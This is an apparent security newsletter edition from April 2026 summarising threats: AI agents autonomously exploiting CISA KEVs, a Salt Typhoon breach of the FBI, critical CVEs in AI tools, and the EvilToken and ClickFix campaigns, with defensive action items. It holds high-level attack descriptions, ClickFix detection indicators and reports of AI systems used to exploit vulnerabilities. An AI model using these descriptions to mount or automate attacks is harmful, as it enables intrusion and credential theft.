Security daily

Edition 2026-04-10 · read as Security

AIAgentsExploit103of122CISAKEVsinUnderanHour

Sources
36
Words
1,519
Read
8min

Topics Agentic AI AI Regulation AI Capital

◆ The signal

A Sequoia-backed startup just proved that commodity AI agents — built from off-the-shelf Anthropic, OpenAI, and Google models anyone can buy — autonomously exploited 103 of 122 CISA KEVs in under an hour, including React2Shell in 22 minutes. Simultaneously, 12+ critical CVEs (CVSS 9.0–10.0) surfaced this week across AI tools your teams are running without security review — FastGPT, Claude Code CLI, llama.cpp, LiteLLM. Your patch-based defense model cannot outrun machine-speed exploitation, and the AI tools you're deploying to close the gap are themselves unpatched attack surface. Audit every unpatched KEV and every shadow AI tool in your environment today.

◆ INTELLIGENCE MAP

  1. 01

    Commodity AI Exploits 84% of CISA KEVs Autonomously

    act now

    Buzz chained off-the-shelf LLMs to exploit 103/122 CISA KEVs without human oversight, most in under an hour. React2Shell fell in 22 minutes. Skill barrier for sophisticated exploitation has collapsed to an API key and a prompt. Chevron's CISO recommends assuming breach and prioritizing segmentation over patching speed.

    84.4%
    KEV autonomous exploit rate
    4
    sources
    • KEVs exploited
    • React2Shell time
    • Human oversight
    • Skill barrier
    1. AI Agent (Buzz)84.4
    2. Time to Exploit60
    3. React2Shell22
    4. Human Oversight0
  2. 02

    Salt Typhoon Breaches FBI Through Commercial ISP

    act now

    FBI declared a 'major incident' after China-linked actors breached FBI systems through a commercial ISP, accessing law enforcement sensitive data including surveillance target identities. This escalates Salt Typhoon's 2024 lawful intercept campaign into direct federal compromise. No public countermeasures report exists 18 months after the original campaign.

    1
    sources
    • Incident class
    • Vector
    • Data exposed
    • Gap since 2024
    1. 2024: Salt TyphoonTelecom lawful intercept portals breached; ~40 targets
    2. Mar 2026: FBI breachISP pivot into FBI systems; LEA data exposed
    3. Apr 2026: Major incidentFormally declared; no public countermeasure report yet
  3. 03

    AI/ML Tool CVE Explosion: 12+ Critical Vulns in Your Shadow AI Stack

    monitor

    A dozen critical CVEs surfaced in AI infrastructure this week: FastGPT CVSS 10.0 (unauthenticated HTTP proxy), Claude Code CLI CVSS 9.8 (credential-stealing command injection), llama.cpp CVSS 9.8 (RCE via deserialization), LiteLLM CVSS 9.1 (auth bypass), plus 6 PraisonAI CVEs. Most require zero authentication. 12K+ Flowise instances remain exposed. These tools are likely running in your environment without security review.

    12+
    critical AI tool CVEs
    4
    sources
    • FastGPT CVSS
    • Claude Code CLI
    • llama.cpp
    • Flowise exposed
    1. 01FastGPT10
    2. 02Claude Code CLI9.8
    3. 03llama.cpp9.8
    4. 04Kestra9.9
    5. 05LiteLLM9.1
    6. 06PraisonAI (6 CVEs)9
  4. 04

    EvilToken + ClickFix: New Campaigns Targeting Default-Enabled Features

    monitor

    EvilToken PhaaS solved device code phishing's 15-minute expiration problem by generating codes dynamically at click-time via Railway.com, then maps org charts via Microsoft Graph for targeted executive exfiltration. ClickFix MaaS bundles its own Node.js runtime, evades 30+ security products, and loads fileless infostealers via Tor C2. Both exploit features you intentionally enabled.

    30+
    security products evaded
    2
    sources
    • EvilToken vector
    • ClickFix evasion
    • ClickFix C2
    • Target
    1. EvilToken PhaaS15
    2. ClickFix MaaS30
  5. 05

    Shadow AI Data Governance: The 60-Trillion-Token Blind Spot

    background

    Meta's leaked Claudeonomics dashboard revealed 60 trillion tokens consumed via Anthropic's Claude in 30 days — the top user alone hit 281 billion tokens. Meta shut it down after data leaked externally. Separately, 46% of enterprise identity activity occurs outside IAM visibility and 40% of accounts are orphaned. Your AI governance gap is measurable and growing.

    60T
    tokens in 30 days
    6
    sources
    • Meta monthly tokens
    • Top user tokens
    • Identity blind spot
    • Orphaned accounts
    1. IAM-visible identity54
    2. Outside IAM visibility46

◆ DEEP DIVES

  1. 01

    Commodity AI Exploits 84% of CISA KEVs in Under an Hour — Your Patch Window Just Collapsed to Zero

    The Data That Changes Your Planning Assumptions

    Sequoia-backed cybersecurity startup Buzz published research this week demonstrating that an AI agent — assembled from off-the-shelf Anthropic, OpenAI, and Google models — autonomously exploited 103 of 122 CISA Known Exploited Vulnerabilities without human oversight. Most completed in under an hour. React2Shell, one of 2025's most dangerous flaws, fell in 22 minutes.

    This is not Mythos. This is not a restricted frontier model behind a $100M consortium. This was built with commodity API access anyone can purchase today. Co-founders Niv Hoffman and Yair Saban fed the AI agent CISA's public KEV catalog — the same list designed to help defenders prioritize patching — and the agent treated it as a machine-readable target list.

    "We're now in this gap where attackers are by default early adopters of AI, and defenders by default aren't — they're risk averse, don't want to touch production much, and that definitely needs to change." — Niv Hoffman, Buzz co-founder

    The Exploitation Speed Asymmetry

    MetricAI Agent (Buzz)Human AttackerDefender (Patch)
    KEV Exploitation Rate84.4% (103/122)Variable, skill-dependentN/A
    Time to ExploitUnder 1 hour (most)Several daysDays to weeks to patch
    React2Shell22 minutesDaysDays to weeks
    Skill BarrierAPI keyAdvanced skillsSysadmin + change mgmt
    ScalabilityMassively parallelLimited by headcountLimited by headcount

    Separately, the Internet Bug Bounty program paused new submissions this week, explicitly citing that AI-assisted research "radically lowered the cost of vulnerability discovery." The economics of offense have collapsed. Chevron CISO Jon Raper put it bluntly: "Finding vulnerabilities isn't the problem — it's remediating them in time."

    The CISA KEV Catalog Paradox

    CISA built the KEV catalog to help defenders prioritize. It now equally functions as an AI-readable attack playbook. Buzz literally fed it to their agent. This doesn't mean CISA should stop publishing — transparency still helps — but the window between KEV publication and AI-automated exploitation is now measured in minutes, not days.

    What This Means for Your Defense Model

    When patching speed can never match exploitation speed, your defensive strategy must shift from "patch before exploit" to "contain during exploit." Microsegmentation, behavioral detection, and automated containment become survival controls, not aspirational improvements. The risk of deploying AI-assisted defense imperfectly is now demonstrably lower than the risk of defending at human speed.

    Action items

    • Pull your current CISA KEV patch coverage report and identify every unpatched KEV in production by end of day Friday
    • Verify React2Shell remediation across all environments including containers and third-party deployments within 48 hours
    • Accelerate microsegmentation deployment to critical assets this quarter — prioritize identity infrastructure, databases, and CI/CD
    • Deploy automated host isolation and network quarantine playbooks for known KEV exploitation signatures this month
    • Brief the board within two weeks: 'AI has compressed exploitation from days to minutes; our defense model assumes days; we need budget to close this gap'

    Sources:AI agents just exploited 84% of CISA KEVs in under an hour · AI just went 90x on exploit generation · Thousands of Zero-Days Found in Weeks: AI Just Broke Your Vulnerability Management Model · Your threat model just broke: AI now writes sandbox-escape exploit chains autonomously

  2. 02

    Salt Typhoon Breached FBI Through a Commercial ISP — Your Telecom Vendor Is Attack Surface

    The Escalation

    The FBI has formally declared a "major incident" after China-linked actors breached FBI systems through a commercial Internet Service Provider, accessing law enforcement sensitive data including returns from legal process and PII of investigation subjects. This means Chinese intelligence now knows — or can infer — who the FBI is surveilling.

    This is a direct escalation of Salt Typhoon's 2024 campaign, which compromised telecom companies' lawful intercept portals and targeted calls and metadata of approximately 40 individuals including political figures. The 2026 breach is worse: the attack vector shifted from targeting telecom companies directly to pivoting through a commercial ISP into federal infrastructure.

    There has been no in-depth public report detailing exactly what happened in the 2024 Salt Typhoon breaches or appropriate countermeasures — an 18-month gap between discovery and systematic defensive guidance.

    Why This Changes Your Threat Model

    The attack chain is deceptively simple and broadly applicable:

    1. Compromise a commercial ISP (which has network-level access to customers)
    2. Pivot from ISP infrastructure into customer networks
    3. Access sensitive data through trusted connectivity

    Your ISP is not just a service provider — it is a network-adjacent trust relationship with visibility into your traffic. If Chinese APTs can use that position to pivot into the FBI, they can use it to pivot into any customer on that ISP's infrastructure. This applies to every organization with dedicated circuits, MPLS connections, or co-location relationships with connectivity providers.

    Simultaneously: Forest Blizzard's SOHO Campaign Scales

    In a related development, Microsoft Threat Intelligence confirmed that Forest Blizzard (Fancy Bear/GRU) and sub-group Storm-2754 have compromised 5,000+ SOHO routers across 200 organizations since August 2025. They hijack DNS via dnsmasq to conduct adversary-in-the-middle attacks against Outlook Web Access users, with confirmed data interception from three African government organizations. The FBI's Operation Masquerade disrupted the U.S. segment, but the adversary will adapt.

    Two major nation-state actors — China and Russia — are simultaneously exploiting the connectivity infrastructure layer as an attack vector. The common thread: your security stack sits above the network layer these actors are targeting.

    Action items

    • Request security attestations and incident disclosure statements from all connectivity providers within 30 days — specifically ask about compromise detection capabilities and law enforcement cooperation segmentation
    • If your organization processes CALEA compliance or lawful intercept requests, segregate those systems from general infrastructure this week
    • Enforce DNS-over-HTTPS on all managed endpoints via MDM/GPO immediately to bypass SOHO router DNS hijacking
    • Issue SOHO router hygiene guidance to all remote workers this week: reset DNS, update firmware, change default credentials

    Sources:Salt Typhoon breached FBI via your ISP's infrastructure · EvilToken is phishing your M365 execs with dynamic device codes · APT28 was hiding in your remote workers' routers

  3. 03

    12+ Critical CVEs in AI/ML Tools Your Teams Deployed Without Security Review

    The AI Tool Vulnerability Landscape This Week

    A wave of critical vulnerabilities in AI/ML infrastructure surfaced this week — not in frontier models, but in the agent frameworks, proxy gateways, inference engines, and developer CLIs your teams spun up without security review. SANS declared that for the first time in RSAC keynote history, every one of the five most dangerous new attack techniques carries an AI dimension.

    CVEProductCVSSVulnerabilityAuth Required?
    CVE-2026-34162FastGPT10.0Unauthenticated HTTP proxy — full request forwardingNo
    CVE-2026-35022Claude Code CLI / Agent SDK9.8OS command injection → credential theftNo
    CVE-2026-34159llama.cpp9.8RCE via unbounded deserializationNo
    CVE-2026-34612Kestra9.9SQL injection to RCENo
    CVE-2026-35030LiteLLM9.1Auth bypass inheriting legitimate user identityNo
    6 CVEsPraisonAI9.0–10.0Multiple critical vulnerabilitiesVaries

    The pattern is unmistakable: these tools were designed for rapid experimentation and deployed to production without security maturity. Most require zero authentication for exploitation. A compromised Flowise instance (12K+ internet-exposed) isn't just one box — it's a pivot into LLM API keys, vector databases, and backend data sources the agent interacts with.

    Developer Toolchain Under Simultaneous Attack

    The attack surface extends beyond AI-specific tools into the developer toolchain itself:

    • Ruby LSP (CVE-2026-34060, CVSS 9.8): Arbitrary code execution via malicious .vscode/settings.json — cloning a repo is enough to get compromised
    • Nektos Act (CVE-2026-34041, CVSS 9.8): Environment injection in the most popular local GitHub Actions runner
    • Vite (CVE-2025-30208): File access bypass now under active exploitation on ISC honeypots — targeting standard web ports (80/443), not Vite's default 5173, indicating attackers are hunting production instances behind reverse proxies

    The Vite exploitation detail is particularly telling: attackers aren't scanning for development tools on expected ports — they're looking for Vite instances accidentally deployed behind production reverse proxies. Your dev tools in production are being actively hunted.

    The Governance Gap

    Nearly 50% of organizations cannot fully track AI and non-human identities accessing critical systems, despite 87% claiming AI readiness. New tools are emerging — StepSecurity's dev-machine-guard scans developer machines for AI agents and MCP servers, Knostic's AgentSonar provides network-level shadow AI detection — but adoption lags the threat by months.

    If you don't know which AI tools your engineers are running, you have blind spots with CVSS 10.0 exposure.

    Action items

    • Inventory all AI/ML tools across the organization this week — survey engineering, data science, and business analyst teams for FastGPT, llama.cpp, Claude Code CLI, LiteLLM, PraisonAI, and Flowise deployments
    • Scan external attack surface for any internet-exposed Flowise, FastGPT, or AI agent builder instances immediately
    • Deploy Elastic's supply-chain-monitor for PyPI/npm dependencies and evaluate StepSecurity dev-machine-guard for developer endpoint AI agent inventory this month
    • Search proxy and load balancer configs for backend targets on port 5173 (Vite) this week — patch CVE-2025-30208 across all environments
    • Establish mandatory security vetting for AI tool deployment — no AI framework goes to production without AppSec review

    Sources:Your security scanner may be the weapon: TeamPCP's Trivy supply chain attack · Flowise CVSS 10.0 under active exploit + Iran targeting AI infrastructure · Your threat model just broke: AI now writes sandbox-escape exploit chains autonomously · AI Agents Now Merge PRs in Your GitHub Repos

  4. 04

    EvilToken and ClickFix: Two New Campaigns Exploiting Features You Intentionally Enabled

    EvilToken: Device Code Phishing Solved Its Scalability Problem

    Microsoft Defender researchers tracked a large-scale device code phishing campaign powered by the EvilToken Phishing-as-a-Service toolkit. The critical innovation: attackers use Railway.com to spin up ephemeral Node.js polling nodes that generate device codes dynamically at the moment of click, solving the fundamental 15-minute expiration limitation that previously made device code phishing impractical at scale.

    Phishing emails are role-tailored — invoices for finance, RFPs for procurement, manufacturing workflows for operations — boosting interaction rates. Post-authentication, attackers use Microsoft Graph API to enumerate organizational structures and zero in on financial and executive accounts for email exfiltration. This is targeted intelligence collection, not spray-and-pray.

    Why Default-Enabled Device Code Flows Are the Problem

    M365 device code authentication flows are enabled by default in most Entra ID tenants. Most organizations never touch this setting because device code auth is a legitimate feature for headless devices and kiosks. EvilToken weaponizes this gap between feature intent and security exposure.

    ClickFix: Enterprise-Grade Evasion in a MaaS Package

    Netskope Threat Labs identified a ClickFix campaign using a fake CAPTCHA prompting execution of a PowerShell command that downloads a Node.js-based RAT. The sophistication is notable:

    • Bundles its own Node.js runtime — doesn't depend on victim having Node installed
    • Installs in a "LogicOptimizer" folder with Registry persistence
    • Routes all C2 through Tor
    • Scans for 30+ security products before deploying payloads
    • Dynamically loads infostealer modules into memory only — never touching disk
    • Uses gRPC-based C2 with real-time Telegram alerts to affiliates on successful crypto wallet thefts

    An OPSEC failure by the operators exposed the admin panel, revealing the full C2 architecture. But the operational model — fileless payloads, Tor routing, 30+ AV evasion — means your disk-based AV and signature-based detection will miss this entirely.

    The Common Thread

    Both campaigns exploit features you intentionally enabled: device code flows for device registration, PowerShell for administration. The attack surface expanded because the feature surface expanded. Your SOC needs detection rules tuned for these specific behavioral patterns, not just signatures.

    Action items

    • Create a Conditional Access policy in Entra ID blocking device code authentication for all users except explicitly approved device registration scenarios — do this today
    • Review Entra ID sign-in logs for anomalous device code tokens issued in the past 90 days — look for Railway.com infrastructure or unusual polling patterns
    • Deploy behavioral detection rules for ClickFix indicators: msiexec spawning Node.js child processes, Tor connections from non-browser processes, Registry persistence under 'LogicOptimizer' paths
    • Audit Grafana instances for enabled AI/LLM features and restrict image source domains this week

    Sources:EvilToken is phishing your M365 execs with dynamic device codes · EvilToken is phishing your M365 execs with dynamic device codes

◆ QUICK HITS

  • Update: Mythos generates 181 working Firefox exploits vs. predecessor's 2 (90x jump); Internet Bug Bounty paused new submissions citing AI-lowered discovery costs

    AI just went 90x on exploit generation

  • LAPD lost 7.7TB (300K+ documents) including personnel records and unredacted investigation files — breach vector was a third-party system connected to the City Attorney's office

    Windows BlueHammer 0-day is public with no patch, and Iran is hitting your OT

  • AWS IAM has a ~4-second eventual consistency window where disabled credentials remain valid — OFFENSAI released 'notyet' tool to exploit this during incident response; update IR playbooks to enforce network-level containment simultaneously with credential revocation

    Your threat model just broke: AI now writes sandbox-escape exploit chains autonomously

  • Cisco IMC auth bypass (CVE-2026-20093, CVSS 9.8) and Cisco SSM On-Prem unauthenticated RCE (CVE-2026-20160, CVSS 9.8) — patch immediately and verify management interfaces are on isolated VLANs

    Your security scanner may be the weapon: TeamPCP's Trivy supply chain attack

  • ShareFile Storage Zones Controller critical vulnerabilities (CVE-2026-2699 and CVE-2026-2701, CVSS 9.1–9.8) now have public exploit code from watchTowr Labs — patch before weaponization scales

    Your security scanner may be the weapon: TeamPCP's Trivy supply chain attack

  • Meta shut down internal Claudeonomics leaderboard after data leaked externally — revealed 60 trillion tokens of Anthropic Claude consumed in 30 days, top user at 281 billion tokens; direct evidence your shadow AI governance gap is quantifiable

    60 Trillion Tokens in 30 Days: Meta's 'Claudeonomics' Leak

  • Kaspersky: infostealers surged 59% globally, 1M+ banking accounts from top-100 banks circulating on dark web, 74% of compromised payment cards remain valid; phishing lures shifted from banks to Netflix, Apple, Spotify

    EvilToken is phishing your M365 execs with dynamic device codes

  • IRGC published satellite coordinates of OpenAI's $30B Stargate data center in Abu Dhabi and threatened 'complete annihilation' — first known nation-state kinetic threat against AI infrastructure

    Flowise CVSS 10.0 under active exploit + Iran targeting AI infrastructure

  • Bot-driven fraud surged 59% in 2025 with North American desktop browser attacks more than doubling while mobile app attacks declined — your mobile-first fraud detection investment displaced risk, didn't eliminate it

    Bot fraud up 59% and shifting to your desktop browser

  • HeyGen Avatar V builds photorealistic video deepfakes from a 15-second phone recording with identity/appearance separation — brief executive and finance teams, reinforce out-of-band verification for all wire transfers

    Autonomous AI agents and hyper-realistic deepfakes just got easier

  • DeepSeek V4: 1-trillion-parameter model training entirely on Huawei Ascend 950PR silicon — first frontier model with zero NVIDIA dependency, proving US chip export controls have not prevented Chinese frontier AI development

    Flowise CVSS 10.0 under active exploit + Iran targeting AI infrastructure

  • 24K fake Claude accounts used for industrial-scale model cloning; Anthropic, OpenAI, and Google now sharing threat intelligence cooperatively to block the campaign

    Flowise CVSS 10.0 under active exploit + Iran targeting AI infrastructure

◆ Bottom line

The take.

Commodity AI agents — built from off-the-shelf models anyone can buy — just proved they can exploit 84% of CISA's Known Exploited Vulnerabilities in under an hour with zero human oversight, while simultaneously, a dozen critical unauthenticated RCE vulnerabilities (CVSS 9.0–10.0) exist in the AI tools your teams deployed without telling you, China breached the FBI through a commercial ISP, and two new phishing/malware campaigns are exploiting M365 features you left enabled by default. The question is no longer whether your defenses are good enough — it's whether they operate at machine speed, because your adversaries now do.

— Promit, reading as Security ·

Frequently asked

How should defenders adapt when AI compresses exploit time to minutes?
Shift from a 'patch before exploit' model to a 'contain during exploit' posture. Prioritize microsegmentation of identity, database, and CI/CD infrastructure, deploy automated host isolation and network quarantine playbooks, and accept higher false-positive tolerance — the cost of an unnecessary isolation is now far lower than the cost of a compromise that unfolds in under an hour.
Which AI/ML tools carry the highest-severity vulnerabilities this week?
FastGPT (CVE-2026-34162, CVSS 10.0) exposes an unauthenticated HTTP proxy; Claude Code CLI (CVE-2026-35022, 9.8) allows unauthenticated OS command injection; llama.cpp (CVE-2026-34159, 9.8) has unbounded deserialization RCE; LiteLLM (CVE-2026-35030, 9.1) allows auth bypass; Kestra (CVE-2026-34612, 9.9) has SQL injection to RCE; and PraisonAI has six critical CVEs rated 9.0–10.0. Most require no authentication.
Why is the FBI's ISP-based breach relevant to private sector security teams?
Because the same trust relationship exists with every commercial connectivity provider. Salt Typhoon pivoted from a commercial ISP into federal infrastructure, demonstrating that ISPs are a network-adjacent trust boundary with visibility into customer traffic. Any organization with dedicated circuits, MPLS, or co-location relationships inherits that pivot risk and should demand security attestations and segregate sensitive systems.
What is the most effective immediate mitigation against EvilToken device code phishing?
Create a Conditional Access policy in Entra ID that blocks device code authentication for all users except explicitly approved device registration scenarios. Device code flows are enabled by default in most tenants, and EvilToken's use of Railway.com to generate codes dynamically at click-time has eliminated the 15-minute expiration window that previously limited this attack.
Why will signature-based detection miss the ClickFix RAT?
The malware bundles its own Node.js runtime, routes all C2 through Tor, scans for 30+ security products before deploying payloads, and loads infostealer modules into memory only — never touching disk. Effective detection requires behavioral rules such as msiexec spawning Node.js children, Tor connections from non-browser processes, and Registry persistence under 'LogicOptimizer' paths.

◆ Same day, different angle

Read this day as…

  1. 20 shared

    Anthropic's Claude Mythos Preview has autonomously discovered thousands of high-severity zero-day vulnerabilities across every major OS, browser, and the Linux kernel — including bugs undetected for 27 years — and Alex Stamos estimates open-weight models will replicate this capability within 6 months.

    AI just discovered thousands of zero-days in every major OS and browser, and open-weight models will replicate this capability within 6 mont…

  2. 19 shared

    Vercel was breached through a compromised third-party AI tool's OAuth grant (Context.ai → Google Workspace → production), with stolen NPM tokens, GitHub tokens, and API keys now for sale — while simultaneously, Anthropic's MCP SDK ships RCE-enabling defaults across thousands of servers, and Cursor AI can be weaponized for persistent macOS RCE through a malicious repo README.

    Vercel was breached through a compromised AI tool's OAuth grant — the first major incident proving that the third-party AI integrations your…

  3. 19 shared

    SharePoint zero-day CVE-2026-32201 is under active exploitation, Windows Defender 0-day 'RedSun' has public exploit code on GitHub with no patch, and Thymeleaf CVE-2026-40478 is a critical RCE affecting every version of the default Spring Boot template engine ever released.

    You're facing simultaneously exploited zero-days in SharePoint and Adobe, unpatched Windows Defender and Windows privilege escalation with p…

◆ Recent in security

Keep reading.